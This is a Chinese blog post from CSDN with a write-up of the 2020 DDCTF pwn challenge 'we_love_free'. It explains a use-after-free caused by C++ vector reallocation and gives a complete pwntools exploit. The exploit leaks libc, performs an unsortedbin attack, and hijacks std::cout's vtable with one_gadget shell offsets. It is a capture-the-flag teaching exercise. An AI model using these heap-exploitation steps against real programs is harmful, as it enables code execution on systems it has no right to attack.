2020DDCTF we_love_free C++ vector

最新推荐文章于 2021-07-06 16:25:18 发布
最新推荐文章于 2021-07-06 16:25:18 发布
阅读量191 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowleopard_bin/article/details/108955258
版权

vector的特性扩容特性,1,2,4,8,16......个元素,每次超过阈值,就会将之前的堆块释放,并重新申请大堆块。对应的chunk大小为0x20,0x20,0x50,0x90......

vector的内存分布为

first  |  cur |  last

这题漏洞在于show函数push 0xaabbccdd之后如果vector进行了扩容,就会将之前的chunk释放,但是begin全局变量还是指向原来的堆块,形成UAF漏洞。 

利用方式是覆盖在bss段中的std::cout/std::cin的虚表指针为one_gadget

#-*- coding:utf-8 -*-
from PwnContext import *
context.terminal = ['tmux','splitw','-h']
s       = lambda data               :ctx.send(str(data))
sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
sl      = lambda data               :ctx.sendline(str(data)) 
sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
r       = lambda numb=4096          :ctx.recv(numb)
ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
irt     = lambda                    :ctx.interactive()
rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
uu32    = lambda data   :u32(data.ljust(4, '\0'))
uu64    = lambda data   :u64(data.ljust(8, '\0'))
leak_libc=lambda data=0   :uu64(ru('\x7f',drop=False)[-6:])-data

debugg = 1
logg = 0
ctx.binary = './pwn1'
ctx.breakpoints=[0x40121E]
ctx.symbols={'lst':0x605380}

if debugg:
    rs()
else:
    ctx.remote = ('0.0.0.0', 23339)
    rs('remote')
#ctx.start("gdb",gdbscript="set follow-fork-mode child\nc")
if logg:
    context.log_level='debug'
def lg(s,d):
    success(str(s)+' = '+hex(d))
def cmd(idx):
    sla('>>',idx)

def add(c):
    cmd(1)
    sla('num:',c)

def free():
    cmd(3)
    
def show():
    cmd(2)


#leak libc_base
for i in range(0x10):
    add(i)
show()
ru('1:')
libc_base = int(ru('\n'))-0x3c4b78
lg('libc_base',libc_base)
for i in range(34):
    sla('(y/n):','n')
free()#clear
one = 0x4526a+libc_base
lg('one',one)

#avoid consolidate 将top_chunk往下移
for i in range(0x21):
    add(str(one))
free()#clear

#unsortedbin attack
for i in range(0x10):
    add(str(0x21))
show()
sla('(y/n):','n')
sla('(y/n):','y')
sl(str(0x6051E8))
for i in range(15):
    sla('(y/n):','n')
sla('(y/n):','y')
sl(str(0x41))#change size to avoid unlink
for i in range(16):#rest
    sla('(y/n):','n')
free()#clear

#dbg()
for i in range(9):
    add(i)

irt()
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
  '''

https://github.com/Snowleopard-bin/pwn/tree/master/cpp

snowleopard_bin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C++笔记之动态数组的申请和手动实现一个简单的vector
小勇博客
11-04 481
此外,动态数组的内存大小必须在运行时明确定义,并且需要手动处理分配和释放内存,这可能会引入错误,因此要特别小心。的底层实现是基于动态分配的数组,它使用内部指针来管理内存,并提供了各种方法来操作容器中的元素,包括插入、删除、访问等。是标准库中的一个动态数组容器,它提供了动态大小的数组,类似于C数组,但它具有自动管理内存的功能,可以动态增加或减少数组的大小。,它是一个动态数组的封装,提供了更方便和安全的方法来管理动态数组。的底层实现通常是使用动态分配的数组,以及一些成员函数来管理这个数组的大小和元素。
C++ vector用法(详解!!函数,实现)
热门推荐
L未若的博客
09-30 27万+
1,简述一下vector的基本操作,它的size,capacity(),clear,reverse,reserve,   push_back等!!! 2,说说,vector的存储特性,是顺序存储还是如同链表般,如果是顺序存储的话,那么是如何执行   erase,insert等函数,???(假如后面的空间不够的话,我们需要合理的算法来重新找出一块   相应的空间吗???拷贝,回收吗???是不
攻防世界PWN之Poisonous_Milk(认清vector的结构+house of orange利用)
seaaseesa的博客
02-19 1398
Poisonous_Milk 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,发现是c++写的程序,看起来复杂了很多,这些一大堆,作用只是打印菜单,那么我们把这个函数重命名为menu。 接下来,我们进入下一个函数查看,应该就是主功能区了。 为了便于分析,我们给函数重命名了 创建内容的函数里,最多输入86个字符 实际上只能输入85个字符,并且最后一个会被...
c++ vector用法
05-18 1038
c++ vector用法 C++内置的数组支持容器的机制,但是它不支持容器抽象的语义。要解决此问题我们自己实现这样的类。在标准C++中,用容器向量(vector)实现。容器向量也是一个类模板。标准库vector类型使用需要的头文件:#include 。vector 是一个类模板。不是一种数据类型,vector是一种数据类型。Vector的存储空间是连续的,list不是连
DDCTF2020 Writeup
郁离歌丶的博客
09-11 3395
DDCTF2020 Writeup 全靠lfy带飞orz. Web Web1 照着来一遍请求,拿到jwt,jwt.io看一下是hs256 跑一下key是1,伪造即可拿到client client抓请求发现signature对即可: 逆client,得到signature请求逻辑,根据输出格式、输出长度以及输入,判断出签名是hmacsha256算法,然后密钥是DDCTFWithYou,写个签名脚本打一下 import requests import json import hmac import bas
vc.rar_free download_free watershed_watershed free_分水岭_分水岭算法 C++
09-14
在标题中提到的"vc.rar_free download_free watershed_watershed free_分水岭_分水岭算法 C++",指的是一个基于C++实现的分水岭算法开源代码资源,用户可以免费下载使用。这个压缩包可能包含了实现分水岭算法的源...
c-free.zip_C++软件_Free!
09-14
《C-Free:强大的C++编程工具》 C-Free是一款专为C++编程设计的集成开发环境(IDE),它以其简洁的界面、丰富的功能和良好的兼容性深受编程爱好者喜爱。尤其对于初学者,C-Free提供了友好的学习平台,帮助他们快速...
C++biaozhunku.rar_C++标准库_c++ 标准库_library
09-22
C++标准库是C++编程语言的核心组成部分,它提供了一系列预先定义好的函数、类和对象,使得程序员可以高效地编写程序而无需从零开始构建所有基础功能。C++标准库通常被称为C++ Standard Template Library (STL),但...
Gg.rar_Free!_free apriori mining
09-22
将FP-G rowth算法应用于面向目标的关联规则(OOA)挖掘,对FP-Tree的结点进行了修改,增加了目标支持度计数和效用度累计两个字段,对FP-G ...实验结果表明,改进后的方法比基于Apriori算法和基于D free算法的OOA挖掘效率更高.
Now_we_are_free.zip_Free!_music
09-24
标题 "Now_we_are_free.zip_Free!_music" 暗示了这个压缩包包含的是一首与自由主题相关的音乐作品,可能是一个音乐项目或者一首歌曲的乐谱。"Free!" 这个标签可能是强调音乐是免费提供的,或者是音乐本身表达的情感...
c++ free()函数和malloc()函数的使用
努力努力...
12-13 2万+
malloc是否与free是对应的,如果是new分配的只能用delete而不是free进行释放。 int  a=10; int  *arr=(int *) malloc(sizeof (int)* a); 截取一段简单代码说明: int min_z=1; for(int z=min_z; z<=max_z; z++) { int *vert_x=(int *)malloc(sizeof
C++ vector的漏洞可导致double free
seaaseesa的博客
06-10 1465
在《STL 源码剖析 -- 侯捷》书籍分析的 tass-sgi-stl-2.91.57-source 源码中。 对 vector 的 erase(); 函数有疑问: iterator erase(iterator position) { if (position + 1 != end()) { //把从 position+1 到 finish 之间的元素一个一个复...
数字下变频(DDC)和数字上变频(DUC)
sinat_29862967的博客
07-19 5万+
数字下变频(DDC) DDC的主要目的是经过数字混频将AD采集的中频(IF)数字信号频谱下变频到基带信号,然后完成抽取滤波恢复原始信号,数字下变频时采用数字信号技术来实现下变频的,它包含数字滤波、正交变换、采样、抽取等算法。主要的电路模块由四部分组成:数控振荡、数字混频、采样抽取、数字滤波。 数字上变频(DUC) 数字上变频DUC(Digital Up Converter),无线电发射链...
C++ vector的内部实现原理及基本用法
bob的博客
08-03 6249
本文基于STL vector源代码,但是不考虑分配器allocator,迭代器iterator,异常处理try/catch等内容,同时对_Ucopy()、 _Umove()、 _Ufill()函数也不会过度分析。 一、vector的定义 template<class _Ty, class _Ax> class vector : public _Vector_val<_Ty, _Ax> { // varying size array of v
2019DDCTF_Pwn_strike/祥讲
Jc
05-23 239
注:由于在做iscc的pwn题 发现需要用这个知识点,记录一下。 代码审计 安全机制 考察点 gdb 将断点下在.text:08048610 add esp, 10h ,输入用户名后,截断(ctrl+z),然后查找offset的大小(60(0x3c)) EXP #!/usr/bin/python2 # -*- coding:utf-8 -*- from pwn im...
C++ 朝花夕拾(Vector和双冒号)
weixin_40965132的博客
07-06 542
1. 简介 该系列主要目的是复习C和C++,重拾其中的一些知识。 2. Vector 2.1 概念 标准库类型vector表示对象的集合,其中所有对象的类型都相同,通常也称容器。vector是模板而非类型,由vector生成的类型必须包含vector中元素的类型。 2.2 “两种括号” vector后面如果是"()“这样的普通英文括号,默认是代表元素数量,不设定数量进行初始化的话初始值为0,后面如果是”{}"这种花括号的话,表示的是元素集合,里面的数值代表元素的值。 vector<int> v1
arm题
snowleopard_bin的博客
01-13 208
2020Xman baby_arm 关于调试 用arm-linux-gnueabihf启动,-g 指定调试端口,但不知道如何像正常的pwn题一样在脚本中指定位置起一个gdb调试,导致只能在另一个终端中用gdb-multiarch ,tar rem : port远程调试,在目标地址下断点,c过去。然后由于没有符号表,不能打印system函数地址,而且bin命令、heap等都不能用,只能直接用x来...
DDC基本概念
qq_34244712的博客
07-29 1万+
目录 1、调制与变频 2、基带信号与射频信号 3.IQ调制 3.1IQ调制得到基带信号 3.2IQ调制得到射频信号 4.OFDM系统中的调制与变频 1、调制与变频 有时候调制与变频并不区分,但是不代表我们对其表示的意义不明确。其实调制与变频是信号处理流程中功能不同的两个步骤。 1)如果调制与变频都存在,信号一定是先调制到基带信号,然后在进行变频成为射频信号,最后通过天线发射出去。所...
C++ vector的释放
wangyang20170901的博客
04-24 2万+
    项目上用到vector容器,没有手动释放,总是会在这里出现内存分配不成功的问题,因此对vector的释放了解了一下。    初始代码如下:vector &lt;float*&gt; dets(nTotalLayers); //dets : 记录每层图像的 Hessian 行列式; for (int octave = 0; octave &lt; nOctaves; octave++) {...
__get_free_pages
最新发布
06-13
__get_free_pages是Linux内核提供的一种内存分配函数,用于在物理地址连续的情况下分配多个页框(page frame)。 它的函数原型如下: ``` unsigned long __get_free_pages(gfp_t gfp_mask, unsigned int order); `...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值